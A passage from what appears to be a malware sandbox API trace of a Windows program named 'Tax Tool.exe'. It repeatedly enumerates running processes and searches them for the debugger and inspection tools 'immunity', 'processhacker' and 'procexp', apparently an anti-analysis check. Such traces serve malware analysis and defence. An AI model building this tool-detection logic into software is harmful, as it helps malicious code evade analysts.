th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0055.890] StrStrIW (lpFirst="audiodg.exe", lpSrch="immunity") returned 0x0 [0055.890] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.890] StrStrIW (lpFirst="svchost.exe", lpSrch="immunity") returned 0x0 [0055.890] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0055.891] StrStrIW (lpFirst="dllhost.exe", lpSrch="immunity") returned 0x0 [0055.891] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0055.891] StrStrIW (lpFirst="dllhost.exe", lpSrch="immunity") returned 0x0 [0055.891] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Tax Tool.exe")) returned 1 [0055.892] StrStrIW (lpFirst="Tax Tool.exe", lpSrch="immunity") returned 0x0 [0055.892] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0055.893] StrStrIW (lpFirst="taskhostw.exe", lpSrch="immunity") returned 0x0 [0055.893] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f8 | out: lppe=0x9af5f8*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 0 [0055.893] CloseHandle (hObject=0x1e0) returned 1 [0055.893] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e0 [0055.897] Process32FirstW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0055.898] StrStrIW (lpFirst="[System Process]", lpSrch="processhacker") returned 0x0 [0055.898] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0055.907] StrStrIW (lpFirst="System", lpSrch="processhacker") returned 0x0 [0055.907] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0055.908] StrStrIW (lpFirst="smss.exe", lpSrch="processhacker") returned 0x0 [0055.908] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.908] StrStrIW (lpFirst="csrss.exe", lpSrch="processhacker") returned 0x0 [0055.908] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0055.909] StrStrIW (lpFirst="wininit.exe", lpSrch="processhacker") returned 0x0 [0055.909] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.909] StrStrIW (lpFirst="csrss.exe", lpSrch="processhacker") returned 0x0 [0055.909] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0055.910] StrStrIW (lpFirst="winlogon.exe", lpSrch="processhacker") returned 0x0 [0055.910] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0055.911] StrStrIW (lpFirst="services.exe", lpSrch="processhacker") returned 0x0 [0055.911] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0055.911] StrStrIW (lpFirst="lsass.exe", lpSrch="processhacker") returned 0x0 [0055.911] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.912] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0055.912] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.913] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0055.913] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c4, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0055.913] StrStrIW (lpFirst="dwm.exe", lpSrch="processhacker") returned 0x0 [0055.913] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.914] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0055.914] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.914] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0055.914] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.915] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0055.915] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.916] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0055.916] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.916] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0055.916] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.917] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0055.917] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0055.918] StrStrIW (lpFirst="spoolsv.exe", lpSrch="processhacker") returned 0x0 [0055.918] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.918] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0055.918] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x550, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.919] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0055.919] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0055.920] StrStrIW (lpFirst="sihost.exe", lpSrch="processhacker") returned 0x0 [0055.920] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0055.920] StrStrIW (lpFirst="taskhostw.exe", lpSrch="processhacker") returned 0x0 [0055.920] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0055.921] StrStrIW (lpFirst="explorer.exe", lpSrch="processhacker") returned 0x0 [0055.921] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0055.921] StrStrIW (lpFirst="RuntimeBroker.exe", lpSrch="processhacker") returned 0x0 [0055.921] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0055.922] StrStrIW (lpFirst="ShellExperienceHost.exe", lpSrch="processhacker") returned 0x0 [0055.922] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0055.922] StrStrIW (lpFirst="SearchUI.exe", lpSrch="processhacker") returned 0x0 [0055.923] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.923] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0055.923] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0055.924] StrStrIW (lpFirst="UsoClient.exe", lpSrch="processhacker") returned 0x0 [0055.924] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0055.924] StrStrIW (lpFirst="taskhostw.exe", lpSrch="processhacker") returned 0x0 [0055.925] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0055.925] StrStrIW (lpFirst="WMIADAP.exe", lpSrch="processhacker") returned 0x0 [0055.925] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0055.926] StrStrIW (lpFirst="sppsvc.exe", lpSrch="processhacker") returned 0x0 [0055.926] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x718, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0055.926] StrStrIW (lpFirst="conhost.exe", lpSrch="processhacker") returned 0x0 [0055.926] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0055.927] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="processhacker") returned 0x0 [0055.927] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0055.927] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="processhacker") returned 0x0 [0055.928] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0055.928] StrStrIW (lpFirst="WmiPrvSE.exe", lpSrch="processhacker") returned 0x0 [0055.928] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0055.929] StrStrIW (lpFirst="dllhost.exe", lpSrch="processhacker") returned 0x0 [0055.929] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0055.930] StrStrIW (lpFirst="audiodg.exe", lpSrch="processhacker") returned 0x0 [0055.930] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.930] StrStrIW (lpFirst="svchost.exe", lpSrch="processhacker") returned 0x0 [0055.930] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0055.932] StrStrIW (lpFirst="dllhost.exe", lpSrch="processhacker") returned 0x0 [0055.932] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0055.933] StrStrIW (lpFirst="dllhost.exe", lpSrch="processhacker") returned 0x0 [0055.933] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Tax Tool.exe")) returned 1 [0055.934] StrStrIW (lpFirst="Tax Tool.exe", lpSrch="processhacker") returned 0x0 [0055.934] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0055.934] StrStrIW (lpFirst="taskhostw.exe", lpSrch="processhacker") returned 0x0 [0055.934] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5f0 | out: lppe=0x9af5f0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 0 [0055.935] CloseHandle (hObject=0x1e0) returned 1 [0055.935] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e0 [0055.940] Process32FirstW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0055.940] StrStrIW (lpFirst="[System Process]", lpSrch="procexp") returned 0x0 [0055.940] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0055.946] StrStrIW (lpFirst="System", lpSrch="procexp") returned 0x0 [0055.946] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0055.947] StrStrIW (lpFirst="smss.exe", lpSrch="procexp") returned 0x0 [0055.947] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.948] StrStrIW (lpFirst="csrss.exe", lpSrch="procexp") returned 0x0 [0055.948] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0055.948] StrStrIW (lpFirst="wininit.exe", lpSrch="procexp") returned 0x0 [0055.948] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0055.949] StrStrIW (lpFirst="csrss.exe", lpSrch="procexp") returned 0x0 [0055.949] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0055.950] StrStrIW (lpFirst="winlogon.exe", lpSrch="procexp") returned 0x0 [0055.950] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0055.950] StrStrIW (lpFirst="services.exe", lpSrch="procexp") returned 0x0 [0055.950] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0055.951] StrStrIW (lpFirst="lsass.exe", lpSrch="procexp") returned 0x0 [0055.951] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.952] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0055.952] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.952] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0055.952] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c4, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0055.953] StrStrIW (lpFirst="dwm.exe", lpSrch="procexp") returned 0x0 [0055.953] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.954] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0055.954] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.954] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0055.954] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.955] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0055.955] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, 